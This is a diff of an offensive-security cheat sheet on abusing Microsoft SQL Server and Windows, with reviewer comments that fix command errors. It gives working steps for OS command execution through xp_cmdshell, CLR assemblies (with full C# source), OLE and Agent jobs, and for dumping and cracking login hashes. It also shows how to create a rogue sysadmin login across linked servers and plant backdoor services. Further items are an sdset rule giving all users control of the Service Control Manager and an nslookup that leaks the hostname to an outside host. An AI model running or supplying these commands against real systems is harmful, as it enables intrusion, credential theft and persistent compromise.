sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll'
EXEC xp_calc
sp_dropextendedproc 'xp_calc'
```


## CLR Assemblies

Prerequisites:

* sysadmin privileges
* CREATE ASSEMBLY permission (or)
* ALTER ASSEMBLY permission (or)

The execution takes place with privileges of the **service account**.


### Execute commands using CLR assembly

```ps1
# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop

# Execute command using CLR assembly
Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "whoami" -Verbose
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose

# List all the stored procedures added using CLR
Get-SQLStoredProcedureCLR -Instance <instance> -Verbose
```


### Manually creating a CLR DLL and importing it

Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs`

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;

public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void cmd_exec (SqlString execCommand)
{
Process proc = new Process();
proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();

// Create the record and specify the metadata for the columns.
SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));

// Mark the beginning of the result set.
SqlContext.Pipe.SendResultsStart(record);

// Set values for each column in the row
record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());

// Send the row back to the client.
SqlContext.Pipe.SendResultsRow(record);

// Mark the end of the result set.
SqlContext.Pipe.SendResultsEnd();

proc.WaitForExit();
proc.Close();
}
};
```

Then follow these instructions:

1. Enable `show advanced options` on the server
```sql
sp_configure 'show advanced options',1;
RECONFIGURE
GO
```
2. Enable CLR on the server
```sql
sp_configure 'clr enabled',1
RECONFIGURE
GO
```
3. Trust the assembly by adding its SHA512 hash
```sql
EXEC sys.sp_add_trusted_assembly 0x[SHA512], N'assembly';
```
4. Import the assembly
```sql
CREATE ASSEMBLY my_assembly
FROM 'c:\temp\cmd_exec.dll'
|
||||
WITH PERMISSION_SET = UNSAFE;
|
||||
```
|
||||
5. Link the assembly to a stored procedure
|
||||
```sql
|
||||
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
|
||||
GO
|
||||
```
|
||||
6. Execute and clean
|
||||
```sql
|
||||
cmd_exec "whoami"
|
||||
DROP PROCEDURE cmd_exec
|
||||
DROP ASSEMBLY my_assembly
|
||||
```
|
||||
|
||||
**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL
|
||||
|
||||
```sql
|
||||
CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM
|
||||
0x4D5A90000300000004000000F[TRUNCATED]
|
||||
WITH PERMISSION_SET = UNSAFE
|
||||
GO
|
||||
```
|
||||
|
||||
|
||||
## OLE Automation
|
||||
|
||||
* :warning: Disabled by default
|
||||
* The execution takes place with privileges of the **service account**.
|
||||
|
||||
|
||||
### Execute commands using OLE automation procedures
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdOle -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
|
||||
```
|
||||
|
||||
```ps1
|
||||
# Enable OLE Automation
|
||||
EXEC sp_configure 'show advanced options', 1
|
||||
EXEC sp_configure reconfigure
|
||||
EXEC sp_configure 'OLE Automation Procedures', 1
|
||||
EXEC sp_configure reconfigure
|
||||
|
||||
# Execute commands
|
||||
DECLARE @execmd INT
|
||||
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
|
||||
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'
|
||||
```
|
||||
|
||||
|
||||
```powershell
|
||||
# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py
|
||||
python3 mssqlclient.py 'host/username:password@10.10.10.10' -install -clr Microsoft.SqlServer.Proxy.dll
|
||||
python3 mssqlclient.py 'host/username:password@10.10.10.10' -check -reciclador 'C:\windows\temp\reciclador.dll'
|
||||
python3 mssqlclient.py 'host/username:password@10.10.10.10' -start -reciclador 'C:\windows\temp\reciclador.dll'
|
||||
SQL> enable_ole
|
||||
SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
|
||||
```
|
||||
|
||||
|
||||
## Agent Jobs
|
||||
|
||||
* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
|
||||
* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.
|
||||
|
||||
|
||||
|
||||
### Execute commands through SQL Agent Job service
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell e <base64encodedscript>" -Verbose
|
||||
Subsystem Options:
|
||||
–Subsystem CmdExec
|
||||
-SubSystem PowerShell
|
||||
–Subsystem VBScript
|
||||
–Subsystem Jscript
|
||||
```
|
||||
|
||||
```sql
|
||||
USE msdb;
|
||||
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
|
||||
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ;
|
||||
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
|
||||
EXEC dbo.sp_start_job N'test_powershell_job1';
|
||||
|
||||
-- delete
|
||||
EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
|
||||
```
|
||||
|
||||
|
||||
### List All Jobs
|
||||
|
||||
```ps1
|
||||
SELECT job_id, [name] FROM msdb.dbo.sysjobs;
|
||||
SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id
|
||||
Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose
|
||||
```
|
||||
|
||||
|
||||
## External Scripts
|
||||
|
||||
Requirements:
|
||||
|
||||
* Feature 'Advanced Analytics Extensions' must be installed
|
||||
* Enable **external scripts**.
|
||||
|
||||
```sql
|
||||
sp_configure 'external scripts enabled', 1;
|
||||
RECONFIGURE;
|
||||
```
|
||||
|
||||
|
||||
### Python
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
||||
|
||||
EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
|
||||
WITH RESULT SETS (([cmd_out] nvarchar(max)))
|
||||
```
|
||||
|
||||
|
||||
### R
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
||||
|
||||
EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
|
||||
WITH RESULT SETS (([cmd_out] text));
|
||||
GO
|
||||
|
||||
@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
|
||||
* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution)
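Review bot: several commands in this file will not run as pasted, starting with the `Invoke-SQLOSCmdCLR` and `Invoke-SQLOSCmdOle` lines that end in `"whoami" Verbose` (the `-Verbose` switch has lost its leading hyphen, so PowerShell treats `Verbose` as a positional argument), and the Agent Job example `"powershell e <base64encodedscript>"` which needs `-e`. The "Subsystem Options" list mixes an en dash (`–Subsystem CmdExec`) with the ASCII hyphen (`-SubSystem PowerShell`); only the hyphen form is a valid parameter. In the external-scripts section the Python payload is written on one line as `import subprocess p = subprocess.Popen(...)`, which is a syntax error, and `pandas` is used without an import; suggest `import subprocess, pandas` followed by `;`-separated statements. The OLE example `EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'` passes no command after `/c`. Several fences are mislabelled (`ps1` on pure T-SQL under OLE Automation and List All Jobs, `powershell` on the mssqlclient.py block), which hurts copy-paste and highlighting. Finally, the Agent Jobs prerequisite reads "sysadmin or SQLAgentUserRole, SQLAgentReaderRole, and SQLAgentOperatorRole"; membership in any one of the three msdb Agent roles is enough to create a job, so "or" is the intended conjunction.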
|
|
@ -0,0 +1,103 @@
|
|||
# MSSQL - Credentials
|
||||
|
||||
## Summary
|
||||
|
||||
* [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
|
||||
* [List Credentials on the SQL Server](#list-credentials-on-the-sql-server)
|
||||
* [Proxy Account Context](#proxy-account-context)
|
||||
|
||||
|
||||
## MSSQL Accounts and Hashes
|
||||
|
||||
* MSSQL 2000
|
||||
```sql
|
||||
SELECT name, password FROM master..sysxlogins
|
||||
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
|
||||
-- (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
|
||||
```
|
||||
|
||||
* MSSQL 2005
|
||||
```sql
|
||||
SELECT name, password_hash FROM master.sys.sql_logins
|
||||
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
|
||||
```
|
||||
|
||||
Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
|
||||
|
||||
| Hash-Mode | Hash-Name | Example |
|
||||
| --- | --- | --- |
|
||||
| 131 | MSSQL (2000) | 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578 |
|
||||
| 132 | MSSQL (2005) | 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe |
|
||||
| 1731 | MSSQL (2012, 2014) | 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 |
|
||||
|
||||
|
||||
## List Credentials on the SQL Server
|
||||
|
||||
* List credentials configured on the SQL Server instance
|
||||
```sql
|
||||
SELECT * FROM sys.credentials
|
||||
```
|
||||
|
||||
* List proxy accounts
|
||||
```sql
|
||||
USE msdb;
|
||||
GO
|
||||
|
||||
SELECT
|
||||
proxy_id,
|
||||
name AS proxy_name,
|
||||
credential_id,
|
||||
enabled
|
||||
FROM
|
||||
dbo.sysproxies;
|
||||
GO
|
||||
```
|
||||
|
||||
* [dataplat/dbatools/Get-DecryptedObject.ps1](https://github.com/dataplat/dbatools/blob/7ad0415c2f8a58d3472c1e85ee431c70f1bb8ae4/private/functions/Get-DecryptedObject.ps1)
|
||||
|
||||
|
||||
## Proxy Account Context
|
||||
|
||||
Agent Job using the registered proxy credential.
|
||||
|
||||
```sql
|
||||
USE msdb;
|
||||
GO
|
||||
|
||||
-- Create the job
|
||||
EXEC sp_add_job
|
||||
@job_name = N'WhoAmIJob'; -- Name of the job
|
||||
|
||||
-- Add a job step that uses the proxy to execute the whoami command
|
||||
EXEC sp_add_jobstep
|
||||
@job_name = N'WhoAmIJob',
|
||||
@step_name = N'ExecuteWhoAmI',
|
||||
@subsystem = N'CmdExec',
|
||||
@command = N'c:\windows\system32\cmd.exe /c whoami > c:\windows\temp\whoami.txt',
|
||||
@on_success_action = 1, -- 1 = Quit with success
|
||||
@on_fail_action = 2, -- 2 = Quit with failure
|
||||
@proxy_name = N'MyCredentialProxy'; -- The proxy created earlier
|
||||
|
||||
-- Add a schedule to the job (optional, can be manual or scheduled)
|
||||
EXEC sp_add_jobschedule
|
||||
@job_name = N'WhoAmIJob',
|
||||
@name = N'RunOnce',
|
||||
@freq_type = 1, -- 1 = Once
|
||||
@active_start_date = 20240820,
|
||||
@active_start_time = 120000;
|
||||
|
||||
-- Add the job to the SQL Server Agent
|
||||
EXEC sp_add_jobserver
|
||||
@job_name = N'WhoAmIJob',
|
||||
@server_name = N'(LOCAL)';
|
||||
```
|
||||
|
||||
Execute the Agent job so that a process will be started in the context of the proxy account and execute your code/command.
|
||||
`EXEC sp_start_job @job_name = N'WhoAmIJob'; `
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation - Scott Sutherland - September 10, 2024](https://www.netspi.com/blog/technical-blog/network-pentesting/hijacking-sql-server-credentials-with-agent-jobs-for-domain-privilege-escalation/)
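Review bot: the Proxy Account Context job step references `@proxy_name = N'MyCredentialProxy'` with the comment "The proxy created earlier", but nothing earlier in the file creates a credential or proxy; either show the `sp_add_proxy` / `sp_grant_proxy_to_subsystem` steps or reword the comment to say the proxy must already exist (the "List proxy accounts" query above is how to find one). The hashcat one-liner uses `-m 1731` unconditionally while the table directly beneath it lists 131 for MSSQL 2000 and 132 for MSSQL 2005; the command should say to pick the mode matching the version the hashes came from. The `sp_add_jobschedule` call hard-codes `@active_start_date = 20240820`, which is already in the past for readers and will never fire as a "RunOnce" schedule; since `sp_start_job` is used at the end anyway, consider dropping the schedule or noting the date must be adjusted. The bare `dataplat/dbatools/Get-DecryptedObject.ps1` link under "List Credentials" needs a sentence explaining what it does (decrypting stored credential secrets) and the access it requires.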
|
||||
|
||||
|
|
@ -0,0 +1,166 @@
|
|||
# MSSQL - Database Enumeration
|
||||
|
||||
## Summary
|
||||
|
||||
- [Tools](#tools)
|
||||
- [Identify Instances and Databases](#identify-instances-and-databases)
|
||||
- [Discover Local SQL Server Instances](#discover-local-sql-server-instances)
|
||||
- [Discover Domain SQL Server Instances](#discover-domain-sql-server-instances)
|
||||
- [Discover Remote SQL Server Instances](#discover-remote-sql-server-instances)
|
||||
- [Identify Encrypted databases](#identify-encrypted-databases)
|
||||
- [Version Query](#version-query)
|
||||
- [Identify Users and Roles](#identify-users-and-roles)
|
||||
- [Identify Sensitive Information](#identify-sensitive-information)
|
||||
- [Get Tables from a Specific Database](#get-tables-from-a-specific-database)
|
||||
- [Gather 5 Entries from Each Column](#gather-5-entries-from-each-column)
|
||||
- [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table)
|
||||
- [Dump common information from server to files](#dump-common-information-from-server-to-files)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
* [NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) - A PowerShell Toolkit for Attacking SQL Server
|
||||
* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon/) - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation.
|
||||
|
||||
|
||||
## Identify Instances and Databases
|
||||
|
||||
### Discover Local SQL Server Instances
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceLocal
|
||||
```
|
||||
|
||||
|
||||
### Discover Domain SQL Server Instances
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain -Verbose
|
||||
# Get Server Info for Found Instances
|
||||
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
|
||||
# Get Database Names
|
||||
Get-SQLInstanceDomain | Get-SQLDatabase -NoDefaults
|
||||
```
|
||||
|
||||
### Discover Remote SQL Server Instances
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceBroadcast -Verbose
|
||||
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1
|
||||
```
|
||||
|
||||
### Identify Encrypted databases
|
||||
|
||||
Note: These are automatically decrypted for admins
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLDatabase -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Verbose | Where-Object {$_.is_encrypted -eq "True"}
|
||||
```
|
||||
|
||||
### Version Query
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-Query "select @@version"
|
||||
```
|
||||
|
||||
|
||||
## Identify Users and Roles
|
||||
|
||||
* Query Current User & determine if the user is a sysadmin
|
||||
```sql
|
||||
select suser_sname()
|
||||
Select system_user
|
||||
select is_srvrolemember('sysadmin')
|
||||
```
|
||||
|
||||
* Current Role
|
||||
```sql
|
||||
select user
|
||||
```
|
||||
|
||||
* All Logins on Server
|
||||
```sql
|
||||
Select * from sys.server_principals where type_desc != 'SERVER_ROLE'
|
||||
```
|
||||
|
||||
* All Database Users for a Database
|
||||
```sql
|
||||
Select * from sys.database_principals where type_desc != 'database_role';
|
||||
```
|
||||
|
||||
* List All Sysadmins
|
||||
```sql
|
||||
SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1
|
||||
```
|
||||
|
||||
* List All Database Roles
|
||||
```sql
|
||||
SELECT DB1.name AS DatabaseRoleName,
|
||||
isnull (DB2.name, 'No members') AS DatabaseUserName
|
||||
FROM sys.database_role_members AS DRM
|
||||
RIGHT OUTER JOIN sys.database_principals AS DB1
|
||||
ON DRM.role_principal_id = DB1.principal_id
|
||||
LEFT OUTER JOIN sys.database_principals AS DB2
|
||||
ON DRM.member_principal_id = DB2.principal_id
|
||||
WHERE DB1.type = 'R'
|
||||
ORDER BY DB1.name;
|
||||
```
|
||||
|
||||
|
||||
## Identify Sensitive Information
|
||||
|
||||
### Get Tables from a Specific Database
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DBNameFromGet-SQLDatabaseCommand> -NoDefaults
|
||||
Get Column Details from a Table
|
||||
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DBName> -TableName <TableName>
|
||||
```
|
||||
|
||||
|
||||
* Current database
|
||||
```sql
|
||||
select db_name()
|
||||
```
|
||||
|
||||
* List all tables
|
||||
```sql
|
||||
select table_name from information_schema.tables
|
||||
```
|
||||
|
||||
* List all databases
|
||||
```sql
|
||||
select name from master..sysdatabases
|
||||
```
|
||||
|
||||
|
||||
### Gather 5 Entries from Each Column
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<columnname1,columnname2,columnname3,columnname4,columnname5>" -Verbose -SampleSize 5
|
||||
```
|
||||
|
||||
### Gather 5 Entries from a Specific Table
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query 'select TOP 5 * from <DatabaseName>.dbo.<TableName>'
|
||||
```
|
||||
|
||||
|
||||
### Dump common information from server to files
|
||||
|
||||
```ps1
|
||||
Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv
|
||||
```
|
||||
|
||||
## ee
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
|
||||
* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
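Review bot: the stray `## ee` heading just before the References section looks like a leftover and should be removed. In "Version Query", `Get-SQLInstanceDomain | Get-Query "select @@version"` calls a cmdlet that does not exist in PowerUpSQL; the rest of the page uses `Get-SQLQuery -Query ...`, so this should be `Get-SQLQuery -Query "select @@version"`. In "Get Tables from a Specific Database" the line `Get Column Details from a Table` is prose inside a `ps1` fence and should be a `#` comment. Minor: the "Current Role" bullet runs `select user`, which returns the current database user name rather than a role, so the heading should be "Current Database User".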
|
|
@ -0,0 +1,115 @@
|
|||
# MSSQL - Linked Database
|
||||
|
||||
## Summary
|
||||
|
||||
- [Find Trusted Link](#find-trusted-link)
|
||||
- [Execute Query Through The Link](#execute-query-through-the-link)
|
||||
- [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain)
|
||||
- [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance)
|
||||
- [Query Version of Linked Database](#query-version-of-linked-database)
|
||||
- [Execute Procedure on Linked Database](#execute-procedure-on-linked-database)
|
||||
- [Determine Names of Linked Databases](#determine-names-of-linked-databases)
|
||||
- [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database)
|
||||
- [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table)
|
||||
- [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column)
|
||||
|
||||
|
||||
## Find Trusted Link
|
||||
|
||||
|
||||
```sql
|
||||
select * from master..sysservers
|
||||
```
|
||||
|
||||
|
||||
## Execute Query Through The Link
|
||||
|
||||
```sql
|
||||
-- execute query through the link
|
||||
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
|
||||
select version from openquery("linkedserver", 'select @@version as version');
|
||||
|
||||
-- chain multiple openquery
|
||||
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
|
||||
|
||||
-- execute shell commands
|
||||
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
|
||||
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
|
||||
|
||||
-- create user and give admin privileges
|
||||
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||
```
|
||||
|
||||
## Crawl Links for Instances in the Domain
|
||||
|
||||
A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
|
||||
select * from master..sysservers
|
||||
```
|
||||
|
||||
|
||||
## Crawl Links for a Specific Instance
|
||||
|
||||
```ps1
|
||||
Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
|
||||
select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
|
||||
```
|
||||
|
||||
|
||||
## Query Version of Linked Database
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DBSERVERNAME\DBInstance>`",'select @@version')" -Verbose
|
||||
```
|
||||
|
||||
|
||||
## Execute Procedure on Linked Database
|
||||
|
||||
```ps1
|
||||
SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local";
|
||||
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
|
||||
SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local";
|
||||
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
|
||||
SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local";
|
||||
```
|
||||
|
||||
|
||||
## Determine Names of Linked Databases
|
||||
|
||||
> tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query.
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from sys.databases')" -Verbose
|
||||
```
|
||||
|
||||
|
||||
## Determine All the Tables Names from a Selected Linked Database
|
||||
|
||||
> The result is TableName which feeds into following query
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from <DatabaseNameFromPreviousCommand>.sys.tables')" -Verbose
|
||||
```
|
||||
|
||||
|
||||
## Gather the Top 5 Columns from a Selected Linked Table
|
||||
|
||||
> The results are ColumnName and ColumnValue which feed into following query
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select TOP 5 * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand>')" -Verbose
|
||||
```
|
||||
|
||||
## Gather Entries from a Selected Linked Column
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`"'select * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand> where <ColumnNameFromPreviousCommand>=<ColumnValueFromPreviousCommand>')" -Verbose
|
||||
```
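Review bot: the last query in "Gather Entries from a Selected Linked Column" is missing the comma between the link name and the query string in `openquery(`"<DatabaseLinkName>`"'select * from ...')`, so it fails to parse; every other `openquery` on the page has `,` there. In the "chain multiple openquery" example, the inner query is written with double quotes (`openquery("link2","select @@version as version")`); inside the outer single-quoted string the inner query text must be a doubled-single-quote string (`''select @@version as version''`), otherwise with `QUOTED_IDENTIFIER ON` the engine treats it as an identifier. The "Crawl Links" example later on the page already uses the correct `''...''` form, so the two should be made consistent. Also, the `ps1` blocks under "Crawl Links for Instances in the Domain" and "Crawl Links for a Specific Instance" each mix a PowerShell cmdlet with a bare T-SQL statement; splitting them into `ps1` and `sql` fences would make clear which is run where.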
|
||||
|
|
@ -19,10 +19,11 @@
|
|||
* [Windows Service](#windows-service)
|
||||
* [Elevated](#elevated)
|
||||
* [Registry HKLM](#registry-hklm)
|
||||
* [Winlogon Helper DLL](#)
|
||||
* [GlobalFlag](#)
|
||||
* [Winlogon Helper DLL](#winlogon-helper-dll)
|
||||
* [GlobalFlag](#globalflag)
|
||||
* [Startup Elevated](#startup-elevated)
|
||||
* [Services Elevated](#services-elevated)
|
||||
* [Service Security Descriptor](#servicesecuritydescriptor)
|
||||
* [Scheduled Tasks Elevated](#scheduled-tasks-elevated)
|
||||
* [Binary Replacement](#binary-replacement)
|
||||
* [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp)
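Review bot: replacing the `(#)` placeholders for Winlogon Helper DLL and GlobalFlag with real anchors is a good fix. The new entry `* [Service Security Descriptor](#servicesecuritydescriptor)` resolves to the heading added below, but its link text differs from the heading `### ServiceSecurityDescriptor`, while every other summary entry mirrors its heading word for word; pick one spelling for both.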
|
||||
|
@ -321,7 +322,7 @@ Create a service that will start automatically or on-demand.
|
|||
```powershell
|
||||
# Powershell
|
||||
New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here." -StartupType Automatic
|
||||
sc start pentestlab
|
||||
sc start Backdoor
|
||||
|
||||
# SharPersist
|
||||
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c backdoor.exe" -n "Backdoor" -m add
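Review bot: changing `sc start pentestlab` to `sc start Backdoor` fixes the service-name mismatch with the `New-Service -Name "Backdoor"` line above it, but in a block labelled `# Powershell` the command is still wrong: in Windows PowerShell `sc` is an alias for `Set-Content`, so `sc start Backdoor` writes the string "Backdoor" to a file named `start` instead of starting the service. Use `sc.exe start Backdoor` (or `Start-Service Backdoor`) so the line works in both `cmd.exe` and PowerShell.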
|
||||
|
@ -331,6 +332,46 @@ sc create Backdoor binpath= "cmd.exe /k C:\temp\backdoor.exe" start="auto" obj="
|
|||
sc start Backdoor
|
||||
```
|
||||
|
||||
|
||||
### ServiceSecurityDescriptor
|
||||
|
||||
Allow any arbitrary non-administrative user to have full SYSTEM permissions on a machine persistently by feeding an overly permissive ACL to the service control manager with sdset.
|
||||
|
||||
**Exploit**:
|
||||
|
||||
```ps1
|
||||
sc.exe sdset <ServiceName> <ServiceSecurityDescriptor>
|
||||
```
|
||||
|
||||
The following command grants full control (`Key Access`) over the Service Control Manager to all users (represented by `WD`, which stands for "World"). In other words, it allows any user to start, stop, modify, or control services through the Service Control Manager, which can be a security risk as it opens service management to everyone on the system.
|
||||
|
||||
```ps1
|
||||
sc.exe sdset scmanager D:(A;;KA;;;WD)
|
||||
```
|
||||
|
||||
* `sc.exe`: The Service Control (sc) command is a Windows utility used for managing services.
|
||||
* `sdset`: This option sets a Security Descriptor (SD) for a service or the Service Control Manager itself. A security descriptor defines permissions and access rights to system resources.
|
||||
* `scmanager`: This is the target, referring to the Service Control Manager, which manages the services in the system.
|
||||
|
||||
The `ServiceSecurityDescriptor` is defined using the Service Descriptor Definition Language (SDDL).
|
||||
|
||||
List the permissions for `scmanager`
|
||||
|
||||
```ps1
|
||||
sc.exe sdshow scmanager
|
||||
```
|
||||
|
||||
Alternatively, you can use [zacateras/sddl-parser](https://github.com/zacateras/sddl-parser) to understand the Security Descriptor Definition Language (SDDL), e.g: `./Sddl.Parser.Console.exe "O:BAG:BAD:(A;CI;CCDCRP;;;NS)"`.
|
||||
|
||||
